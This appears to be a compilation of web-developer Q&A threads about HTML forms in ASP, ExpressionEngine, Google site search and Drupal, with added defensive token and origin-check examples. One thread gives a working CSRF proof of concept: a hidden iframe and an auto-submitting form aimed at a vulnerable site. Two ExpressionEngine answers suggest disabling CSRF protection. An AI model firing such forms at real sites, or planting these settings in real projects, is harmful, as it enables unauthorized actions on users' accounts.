I have tried iframing but it doesn't work in a JavaScript-disabled browser. Can anyone please tell me how I can mask a URL so that it still works when JavaScript is disabled? Thanks in advance.
Use POST, rather than GET. Something like this early in the page:
<form action="nextpage" method="post">
<input type="hidden" name="parameter1" value="value1" />
...etc...
This page
</form>
<form action="otherpage" method="post">
<input type="hidden" name="parameter1" value="value1" />
...etc...
That page
</form>
Bit more longwinded, but it will work.
I'm new to ASP very recently and I can't seem to get this to work
<html>
<body>
<form action="test.asp" method="post">
<input type="text" name="text" />
<input type="submit" value="submit" />
</form>
<%
dim x
x=Request.Form("text")
Responce.Write(x)
%>
</body>
</html>
The text box and submit button are displayed; however, this error is displayed and the ASP does not work. I'm not sure if something is wrong with my code or IIS. Any help on this would be much appreciated.
An error occurred on the server when processing the URL. Please contact the system administrator.
If you are the system administrator please click here to find out more about this error.
Could be you have a typo:
Responce.Write(x)
should be:
Response.Write(x)
If you just need to print your "text" variable:
<html>
<body>
<form action="test.asp" method="post">
<input type="text" name="text" />
<input type="submit" value="submit" />
</form>
<%=Request.Form("text")%>
</body>
</html>
I've got a problem with the contact form in Expression Engine. I'm using the code from the docs but after submitting I'm getting this error:
This form has expired. Please refresh and try again.
My code:
{exp:email:contact_form user_recipients="no" recipients="my#emailadress.com" charset="utf-8"}
<h2>Support Form</h2>
<p>
<label for="from">Your Email:</label><br />
<input type="text" id="from" name="from" size="40" maxlength="35" value="{member_email}" />
</p>
<p>
<label for="subject">Subject:</label><br />
<input type="text" id="subject" name="subject" size="40" value="Contact Form" />
</p>
<p>
<label for="message">Message:</label><br />
<textarea id="message" name="message" rows="18" cols="40">
Support Email from: {member_name}
Sent at: {current_time format="%Y %m %d"}
</textarea>
</p>
<p>
<input name="submit" type='submit' value='Submit Form' />
</p>
{/exp:email:contact_form}
I'm using Expression Engine 2.8.0. Thanks guys!
EE requires an XID to be in the form. There is a global variable you can use to generate an XID hash:
<input type="hidden" name="XID" value="{XID_HASH}" />
http://ellislab.com/blog/entry/putting-the-secure-in-secure-mode-forms
For us, adding this to the config.php 'fixed' the problem (more like, put a bandaid on it since it's not an ideal situation)
$config['disable_csrf_protection'] = "y";
I was having this problem only in Chrome and not in Firefox or Safari. I dug into the PHP and realized that it failed this check in Csrf.php:
// Fetch data, these methods enforce token time limits
$this->fetch_session_token();
$this->fetch_request_token();
// Main check
if ($this->request_token === $this->session_token)
{
return TRUE;
}
Then I realized that I had set Chrome to block cookies. I set it so Chrome would allow cookies and I am no longer getting that error message.
I think that's a problem with the secure forms XID hash. You can only submit a form once while using "secure forms" (to stop spammers hijacking them).
A quick way of disabling it is to open system/expressionengine/config/config.php and add this down the bottom to disable it. See if that makes a difference for you.
$config["secure_forms"] = "n";
Obviously using secure forms is preferable though.
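The failure modes reported in this thread (cookies blocked, a form submitted twice, a stale form) reproduced with a small session-bound token check. This is an added example, not ExpressionEngine's code or code from any answer above; the names `issueToken` and `checkToken`, the in-memory store and the one-hour lifetime are assumptions.

```javascript
const nodeCrypto = require('crypto');

const TOKEN_TTL_MS = 60 * 60 * 1000; // assumed one-hour lifetime

// sessionId -> Map(token -> issuedAt). A real application keeps this in its session store.
const sessions = new Map();

// Called when the form is rendered: mint a token bound to the visitor's session.
function issueToken(sessionId, now = Date.now()) {
  const token = nodeCrypto.randomBytes(20).toString('hex');
  if (!sessions.has(sessionId)) sessions.set(sessionId, new Map());
  sessions.get(sessionId).set(token, now);
  return token;
}

// Called on POST. sessionId comes from the session cookie, token from the hidden field.
function checkToken(sessionId, token, now = Date.now()) {
  const outstanding = sessionId === undefined ? undefined : sessions.get(sessionId);
  if (!outstanding) return 'no-session';      // cookie blocked or never set
  if (typeof token !== 'string' || !outstanding.has(token)) return 'unknown-token';
  const issuedAt = outstanding.get(token);
  outstanding.delete(token);                  // single use: a replay fails
  return now - issuedAt > TOKEN_TTL_MS ? 'expired' : 'ok';
}

// Constructed scenarios; timestamps are passed in so the result is deterministic.
function demo() {
  const sid = 'constructed-session-id';
  const first = issueToken(sid, 0);
  const second = issueToken(sid, 0);
  const third = issueToken(sid, 0);
  return {
    normalSubmit: checkToken(sid, first, 1000),
    resubmit: checkToken(sid, first, 2000),
    cookiesBlocked: checkToken(undefined, second, 1000),
    staleForm: checkToken(sid, third, TOKEN_TTL_MS + 1),
  };
}

console.log(demo());
```

Every result other than `ok` would surface to the visitor as the same "form has expired" message, which is why a blocked session cookie and a genuinely stale form look identical from the browser.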
I'm interested in knowing how it is possible to silently submit a POST form for CSRF, without the user having any notice (the document location being redirected to the POSTed URL is not silent).
Example:
<form method='POST' action='http://vulnerablesite.com/form.php'>
<input type='hidden' name='criticaltoggle' value='true'>
<input type='submit' value='submit'>
</form>
On an external site, what would I need to do to trigger this form automatically and silently?
One solution would be to open the form’s action in a frame like an iframe:
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://vulnerablesite.com/form.php' target="csrf-frame" id="csrf-form">
<input type='hidden' name='criticaltoggle' value='true'>
<input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
When testing CSRF locally you may have to overcome several security measures.
For "Blocked loading mixed active content" errors, ensure the protocol (http/https) of the attacker site and target site are the same, or use "//" as protocol for attacker site. Example attack on localhost:
<iframe style="display:none" id="csrf-frame-invisible" name="csrf-frame-invisible"></iframe>
<form style="display:none" method='POST' action='//localhost:4000' target="csrf-frame-invisible" name="csrf-form-invisible" id="csrf-form-invisible">
<input type='hidden' name='boo' value='true'>
<input type='submit' value='Submit'>
</form>
Alternatively set Firefox security.mixed_content.block_active_content to false.
If using Angular, security options prevent you from using inline JavaScript, so you'll need to move the submit to code-behind on the attacker site:
ngOnInit() {
const myForm: HTMLFormElement = document.getElementById('csrf-form-invisible') as HTMLFormElement;
myForm.submit();
}
Finally the attacker site's header 'x-frame-options' must not be set.
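A server-side check that refuses the kind of cross-site form POST discussed in this thread, as an added example that is not part of any answer above. The trusted origin, the `checkRequestOrigin` name and the sample headers are constructed for illustration.

```javascript
// Origins allowed to send state-changing requests (constructed for this example).
const TRUSTED_ORIGINS = new Set(['https://app.example.test']);
const SAFE_METHODS = new Set(['GET', 'HEAD', 'OPTIONS']);

function verdict(allow, reason) {
  return { allow, reason };
}

// headers: object with lower-cased header names, as Node's http module provides.
function checkRequestOrigin(method, headers) {
  if (SAFE_METHODS.has(method.toUpperCase())) return verdict(true, 'safe-method');

  // Fetch Metadata: supporting browsers mark a POST started by another site.
  if (headers['sec-fetch-site'] === 'cross-site') return verdict(false, 'sec-fetch-site');

  // Browsers attach Origin to cross-origin form POSTs; it may be the string "null".
  let source = headers['origin'];
  if (source === undefined && headers['referer'] !== undefined) {
    try {
      source = new URL(headers['referer']).origin; // fall back to Referer
    } catch (e) {
      return verdict(false, 'bad-referer');
    }
  }
  // Policy assumption: a write with neither header is refused.
  if (source === undefined) return verdict(false, 'no-origin-info');
  return TRUSTED_ORIGINS.has(source)
    ? verdict(true, 'origin-match')
    : verdict(false, 'origin-mismatch');
}

// Constructed sample requests (not captured traffic).
const SAMPLES = [
  { name: 'same-origin form', method: 'POST',
    headers: { origin: 'https://app.example.test', 'sec-fetch-site': 'same-origin' } },
  { name: 'hidden form on another site', method: 'POST',
    headers: { origin: 'https://other.example.test', 'sec-fetch-site': 'cross-site' } },
  { name: 'older browser, foreign Referer', method: 'POST',
    headers: { referer: 'https://other.example.test/page.html' } },
  { name: 'no origin information', method: 'POST', headers: {} },
];

function runSamples() {
  return SAMPLES.map((s) => `${s.name}: ${checkRequestOrigin(s.method, s.headers).reason}`);
}

console.log(runSamples().join('\n'));
```

This check complements a per-session token and a `SameSite` cookie attribute rather than replacing them.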
I want to make a simple search box on my website. I think for my situation, the best way is to use something like w3schools.com did. When the user types something and presses Enter, it redirects to google.com/search and searches only w3schools.com in Google, because site:www.w3schools.com is given in the URL. How can I do that?
A simple solution would be something like this:
<html>
<head></head>
<body>
<form method="get" name="searchform" action="http://www.google.com/search" target="_blank">
<input type="hidden" name="sitesearch" value="stackoverflow.com">
<input type="text" name="as_q" size="20" value="Search stackoverflow.com">
<input type="submit" value="Search" title="Search">
</form>
</body>
</html>
But you should also check this out:
http://www.google.com/cse/
Just browse source code and take everything you need, that trick will often do in case of HTML how-to's:
<form method="get" name="searchform" action="http://www.google.com/search" target="_blank">
<input type="hidden" name="sitesearch" value="www.yoursite.com">
<input type="text" name="as_q" size="20" value="Search yoursite.com">
<input type="submit" value="Search" title="Search">
</form>
Well. Actually it seems this is quite an easy job. I have found the solution at:
http://www.askdavetaylor.com/how_can_i_add_a_google_search_box_to_my_web_site.html/
I think what you are looking for is Google Custom Search Engine. Start here: http://www.google.com/cse/docs/ , http://www.google.com/cse/manage/all
I want to create a custom search box and use that to interact with Drupal's search module. Currently everything works pretty well. However, I would also need to use a proper token with the search. I have no idea what key Drupal uses to form this token.
Currently I have:
<form class="search-form" action="/search/node" method="post" id="search-form" accept-charset="UTF-8">
<input type="text" name="keys" class="search_box" value="Search ..." />
<input type="hidden" name="form_id" id="search-form" value="search_theme_form" />
<input type="hidden" name="form_token" value="<?php print drupal_get_token('search_theme_form'); ?>" />
</form>
This works well enough to display the results of one page. If I try to navigate to the second results page, all the results are thrown away.
You should probably use the more proper
$form = drupal_get_form('search_block_form');
return drupal_render($form);
http://api.drupal.org/api/drupal/modules--search--search.module/function/search_form/7
It turned out to be as simple as changing the form from post to get. Here's the HTML for a working solution.
<form class="search-form" action="/search/node" method="get" id="search-form" accept-charset="UTF-8">
<input type="text" name="keys" class="search_box" value="Search ..." />
</form>
You don't need to define tokens or anything of the sort.
And in theme use:
<?php
$form = drupal_get_form('search_block_form');
echo render($form);
?>